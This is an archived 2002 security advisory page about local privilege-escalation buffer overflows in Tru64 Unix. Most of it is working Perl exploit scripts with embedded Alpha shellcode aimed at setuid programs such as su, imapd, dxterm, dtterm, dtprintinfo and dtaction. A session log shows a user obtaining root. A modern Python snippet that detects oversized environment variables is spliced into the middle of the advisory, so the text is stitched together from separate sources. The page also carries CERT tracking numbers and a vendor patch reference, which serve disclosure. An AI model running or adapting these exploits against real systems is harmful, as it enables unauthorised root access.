TUCoPS :: Unix :: General :: unix5666.htm

Tru64 Unix /bin/su exploit
3rd Sep 2002 [SBWID-5666]
COMMAND
	
		Tru64 Unix, dgUX local and remote exploits with bypass of non-exec
		stack
	
	
SYSTEMS AFFECTED
	
		 Tru64 5.1
		 Tru64 5.1A
		 DgUX 4.0
	
	
PROBLEM
	
		Kf <dotslash@snosoft.com> writes:
		
		Just so Compaq does not flip out and try to sue us... it has come to my
		attention that someone with access to our lab has leaked one of the
		exploits for TRU64. We employ people from the general public from all
		over the world for our development so we have not yet pinpointed how
		the code was "lifted" as many people have access to our lab. This issue
		was already passed on to the public in September of 2001 and an exploit
		was ALREADY published by k2 of ADM...so I don't see this as any big
		surprise short of the fact that ours will bypass the non-exec
		stack...just a heads up.
		http://packetstorm.linuxsecurity.com/0101-exploits/tru-64.su.c is
		the code that was released last year... This is the code that we
		created to exploit /bin/su... I believe this is what was leaked.
		
		
		>#!/usr/bin/perl -w
		>#
		># xxxxx (xxxxx@snosoft.com) - 30/05/2002
		>#
		>
		>($offset) = @ARGV,$offset || ($offset = 0);
		>$ret_addr = pack("ll",(0x40010250+$offset),0x1);
		>
		>$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		>$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		>$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		>$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		>$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		>$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		>$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		>$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		>$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		>$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		>
		>$buf_a = "A"x8233;
		>$buf_a .= $ret_addr;
		>
		>$buf_b = pack("l",0x47ff041f)x3750;
		>$buf_b .= $sc;
		>
		>exec("/usr/bin/su",$buf_a,$buf_b,0);
		>
		
		
		-Also-
		
		Regarding the non-exec stack bypass, Ian A. Finlay of the CERT(R)
		Coordination Center proposed to KF the following revised alert titles,
		which are covered by the "master vul" tracking number VU#193347:
		
		
		VU#158499 - csh vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#510235 - dtsession vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#846307 - dxsysinfo vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#671627 - dxchpwd vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#836275 - dtaction vulnerable to buffer overflow via long string of characters supplied as "-contextDir" command line argument
		VU#600699 - dtprintinfo vulnerable to buffer overflow via long string of characters supplied as "-p" command line argument
		VU#320067 - dtterm vulnerable to heap overflow via long string of characters supplied as "-tn" command line argument
		VU#931579 - dxterm vulnerable to heap overflow via long string of characters supplied as "-customization" command line argument
		VU#193347 - Compaq Tru64 non-executable stack contains buffer overflow in SIA libraries
		VU#435611 - /usr/bin/at command vulnerable to buffer overflow via long string of characters supplied as command line argument
		VU#202939 - dtterm vulnerable to buffer overflow via long string of characters supplied as "DISPLAY" environment variable
		VU#693803 - dxpause contains buffer overflow in _XKB_CHARSET library
		VU#569987 - dxconsole contains buffer overflow in _XKB_CHARSET library
		VU#584243 - dtsession contains buffer overflow in _XKB_CHARSET library
		VU#567963 - imapd vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#592515 - inc vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#448987 - uucp vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#437899 - uux vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#531355 - rdist vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#416427 - deliver vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
		VU#177067 - Compaq Tru64 "/usr/bin/passwd" vulnerable to buffer overflow via long string of characters
		VU#864083 - Compaq Tru64 "/bin/chsh" vulnerable to buffer overflow via long string of characters
		VU#137555 - chfn vulnerable to buffer overflow via long string of characters supplied as command line argument
		
		
		
		 Update (09 September 2002)
		 ======
		
		In Snosoft's formal disclosure, titled "Strategic Reconnaissance Team
		Security Advisory (SRT2002-09)":
		
		--snipp--
		
		Here is a quick look at how one of these issues can be exploited. It
		should be fairly self-explanatory.
		
		% uname -a
		OSF1 alpha.snosoft.com V5.1 732 alpha
		% id
		uid=208(stripey) gid=15(users)
		% ls -la /usr/sbin/imapd
		-rws--x--x 1 root bin 789216 Aug 24 2000 /usr/sbin/imapd
		% perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("/usr/sbin/imapd")'
		Segmentation fault
		% su 
		Password:
		# cp /usr/sbin/imapd test
		# chmod a+r test
		# exit
		% perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("dbx","./test")'
		(dbx) r
		signal Segmentation fault at 
		warning: PC value 0x504030200 not valid, trying RA
		warning: RA value 0x504030200 not valid, trying text start
		warning: text start 0x120000000 not valid, trying data start
		warning: Using data start as a text address -- traceback will not work
	> [., 0x140000000] call_pal cflush
		(dbx) 0x140014280/2X
		0x0000000140014280: 0x4141414141414141 0x4141414141414141
		(dbx) q
		% perl -e'$ENV{"NLSPATH"}=(pack("l",0x47ff041f)x227).(`./sc`).pack("ll",0x40014280,0x1);exec("/usr/sbin/imapd")'
		# id
		uid=208(stripey) gid=15(users) euid=0(root)
		# 
		
		
		--snapp--
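The walkthrough above relies on an oversized NLSPATH value carrying a NOP-padded payload. As an added example that is not part of the advisory, here is a defender-side check over captured environment strings that flags the variables these exploits abuse. The variable names, the 1024-byte length and the padding value pack("l",0x47ff041f) come from the page; the function names, the length threshold and the sample inputs are this example's own assumptions.

```python
import re

# Variables the advisory's exploits overflow through (names taken from the page).
WATCHED_VARS = {"NLSPATH", "_XKB_CHARSET", "LANG", "HOME"}
# The page's exploits use a 1024-byte NLSPATH; a much lower bound is still
# generous for a real message-catalog path (threshold is an assumption).
MAX_SANE_LEN = 512
# pack("l", 0x47ff041f) on little-endian Alpha: the "bis $31,$31,$31" NOP sled.
ALPHA_NOP = bytes.fromhex("1f04ff47")
NONPRINTABLE = re.compile(rb"[^\x09\x0a\x0d\x20-\x7e]")

def inspect_env_value(name: str, value: bytes) -> list[str]:
    """Return findings for one environment variable; empty list if benign."""
    findings = []
    if name not in WATCHED_VARS:
        return findings
    if len(value) > MAX_SANE_LEN:
        findings.append(f"{name}: length {len(value)} exceeds {MAX_SANE_LEN}")
    nops = value.count(ALPHA_NOP)
    if nops >= 4:
        findings.append(f"{name}: {nops} repeats of Alpha NOP sled pattern")
    if NONPRINTABLE.search(value):
        findings.append(f"{name}: contains non-printable bytes")
    return findings

def scan_environ(environ: dict[str, bytes]) -> list[str]:
    """Apply inspect_env_value to every variable and collect all findings."""
    out = []
    for name, value in environ.items():
        out.extend(inspect_env_value(name, value))
    return out

# Constructed sample inputs (not captured from a real host).
BENIGN_ENV = {"NLSPATH": b"/usr/lib/nls/msg/%L/%N:", "HOME": b"/home/stripey", "LANG": b"C"}
# Mirrors the page's crash test: NLSPATH = ("A"x1024)."\x01\x02\x03\x04\x05".
SUSPECT_ENV = {"NLSPATH": b"A" * 1024 + b"\x01\x02\x03\x04\x05"}
# Mirrors the shape of the NOP-padded payload, with no shellcode attached.
SLED_ENV = {"HOME": ALPHA_NOP * 64 + b"XX"}

if __name__ == "__main__":
    for env in (BENIGN_ENV, SUSPECT_ENV, SLED_ENV):
        print(scan_environ(env) or ["no findings"])
```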
		
		 Update (16 September 2002)
		 ======
		
		Snosoft has released exploits ...
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 _XKB_CHARSET 
		#
		# stripey (stripey@snosoft.com) - 10/07/2002
		# 
		
		$tgts{"0"} = pack("l",0x40010250).":/usr/bin/X11/dxconsole:uid=root";
		$tgts{"1"} = pack("l",0x40012584).":/usr/bin/X11/dxpause:uid=root";
		$tgts{"2"} = pack("l",0x400101e4).":/usr/dt/bin/dtsession:euid=root";
		 
		unless (($target,$offset,$align) = @ARGV,$align) { 
		 
		 print "-"x72;
		 print "\n Tru64 _XKB_CHARSET overflow, stripey\@snosoft.com, 03/07/2002\n";
		 print "-"x72;
		 print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
		 
		 foreach $key (sort(keys %tgts)) {
		 ($a,$b,$c) = split(/\:/,$tgts{"$key"});
		 print "\t$key. $b ( $c )\n";
		 }
		 
		 print "\n";
		 exit 1;
		} 
		
		($a,$b) = split(/\:/,$tgts{"$target"});
		 
		print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
		 
		$ret = pack("ll",(unpack("l",$a)+$offset), 0x1); 
		 
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff"; 
		 
		$buf_a = "A"x256;
		$buf_a .= $ret;
		 
		$buf_b = "B"x$align;
		if ($target eq "2" ) { 
		 $buf_b .= pack("l",0x47ff041f)x56;
		} else { 
		 $buf_b .= pack("l",0x47ff041f)x3750;
		}
		$buf_b .= $sc; 
		 
		$ENV{"_XKB_CHARSET"} = $buf_a;
		$ENV{"HOME"} = $buf_b; 
		 
		exec("$b"); 
		
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 /usr/bin/su
		#
		# stripey (stripey@snosoft.com) - 30/05/2002
		#
		
		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 0; }
		
		$ret_addr = pack("ll",(0x40010250+$offset),0x1);
		
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		
		$buf_a = "A"x8233;
		$buf_a .= $ret_addr;
		
		$buf_b = "B"x$align;
		$buf_b .= pack("l",0x47ff041f)x3750;
		$buf_b .= $sc;
		
		exec("/usr/bin/su",$buf_a,$buf_b,0);
		
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 NLSPATH
		#
		# stripey (stripey@snosoft.com) - 03/07/2002
		#
		
		$tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";
		$tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";
		$tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";
		$tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";
		$tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";
		$tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";
		$tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid \$DISPLAY";
		$tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid \$DISPLAY";
		$tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";
		$tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";
		$tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";
		
		unless (($target,$offset,$align) = @ARGV,$align) {
		
		 print "-"x72;
		 print "\n Tru64 NLSPATH overflow, stripey\@snosoft.com, 03/07/2002\n";
		 print "-"x72;
		 print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
		
		 foreach $key (sort(keys %tgts)) {
		 ($a,$b,$c) = split(/\:/,$tgts{"$key"});
		 print "\t$key. $b ( $c )\n";
		 }
		
		 print "\n";
		 exit 1;
		}
		
		($a,$b) = split(/\:/,$tgts{"$target"});
		
		print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
		
		$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
		
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		
		$tlen = (1024-(length($sc)))/4;
		
		$buf .= "B"x$align;
		$buf .= pack("l",0x47ff041f)x($tlen-1);
		$buf .= $sc;
		$buf .= $ret;
		
		$ENV{"NLSPATH"} = $buf;
		
		if ($target eq 8) { print "Hit ctrl-d...\n"; }
		
		if ($target eq 3) {
		
		 $buf_b = "AA";
		 $buf_b .= pack("l",0x47ff041f)x512;
		 $buf_b .= $sc;
		
		 open(OH,">.mh_profile");
		 print OH "Path: $buf_b\n";
		 close(OH);
		}
		
		if ($target eq "4") {
		
		 $buf_b = "AA";
		 $buf_b .= pack("l",0x47ff041f)x2000;
		 $buf_b .= $sc;
		
		 open(OH,">.mh_profile");
		 print OH "Path: $buf_b\n";
		 close(OH);
		}
		
		if ($target eq 2) {
		
		 exec("$b","-d","a=asdf","-c","/tmp/","\'\$\{a\}\'");
		
		}
		if ($target eq 0) {
		
		 $buf_b = "B"x30000;
		 exec("$b","-g","-dt",$buf_b);
		
		}
		
		exec("$b");
		
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 /usr/bin/X11/dxterm
		#
		# stripey (stripey@snosoft.com) - 03/07/2002
		#
		
		($offset) = @ARGV,$offset || ($offset = 0);
		
		$ret_addr = pack("ll",(0x4001c828+$offset),0x1);
		
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		
		$buf_a .= pack("l",0x47ff041f)x2048;
		$buf_a .= $sc;
		$buf_a .= $ret_addr;
		
		exec("/usr/bin/X11/dxterm","-customization",$buf_a);
		
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 /usr/dt/bin/dtterm
		#
		# Shellcode modified to exec /tmp/sh instead of /bin/sh...
		#
		# stripey (stripey@snosoft.com) - 30/05/2002
		#
		
		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 3; }
		
		$ret_addr = pack("ll",(0x4001720c+$offset),0x1);
		
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x6d\x70\x7f\x26";
		$sc .= "\x2f\x74\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		
		$buf_a = "A"x8203;
		$buf_a .= $ret_addr;
		
		$buf_b = "B"x$align;
		$buf_b .= pack("l",0x47ff041f)x1024;
		$buf_b .= $sc;
		
		exec("/usr/dt/bin/dtterm","-tn",$buf_a,"-e","\"$buf_b\"",0);
		
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 /usr/dt/bin/dtprintinfo
		#
		# stripey (stripey@snosoft.com) - 01/06/2002
		#
		
		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 1; }
		
		$ret_addr = pack("ll",(0x40033610+$offset),0x1);
		
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		
		$buf_a = "A"x2048;
		$buf_a .= $ret_addr;
		
		$buf_b = "B"x$align;
		$buf_b .= pack("l",0x47ff041f)x1024;
		$buf_b .= $sc;
		
		$ENV{"LANG"} = $buf_a;
		
		exec("/usr/dt/bin/dtprintinfo","-p",$buf_b,0);
		
		
		
		#!/usr/bin/perl -w
		#
		# Tru64 5.1 /usr/dt/bin/dtaction
		#
		# stripey (stripey@snosoft.com) - 01/06/2002
		#
		
		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 0; }
		
		$ret_addr = pack("ll",(0x40016810+$offset),0x1);
		
		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
		
		$buf_a = "A"x2048;
		$buf_a .= $ret_addr;
		
		$buf_b = "B"x$align;
		$buf_b .= pack("l",0x47ff041f)x2221;
		$buf_b .= $sc;
		
		$ENV{"LANG"} = $buf_a;
		
		exec("/usr/dt/bin/dtaction","-contextDir",$buf_b,0);
		
	
	
SOLUTION
	
		HP/Compaq has provided the following advisory and patches:
		
		HP Advisory Ref: SSRT2257
		http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11
	
